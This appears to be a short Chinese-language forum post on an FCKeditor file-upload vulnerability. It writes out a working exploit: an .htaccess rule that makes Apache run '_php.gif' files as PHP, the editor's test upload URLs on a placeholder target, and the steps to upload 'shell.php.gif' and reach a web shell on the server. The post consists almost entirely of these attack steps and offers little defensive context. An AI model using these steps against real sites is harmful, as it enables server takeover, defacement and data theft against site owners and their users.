网上刚报的fck的漏洞,利用htaccess
1.create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html
http://target.com/FCKeditor/edit ... onnectors/test.html
----------------------------------------------------------------------------------------------
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to "shell_php.gif" automatically.
5.http://target.com/anything/shell_php.gif
6.Now shell is available from server.
就是利用前段时间发的一个利用htaccess获得后门的原理,利用htaccess使Apache将_php.gif解析。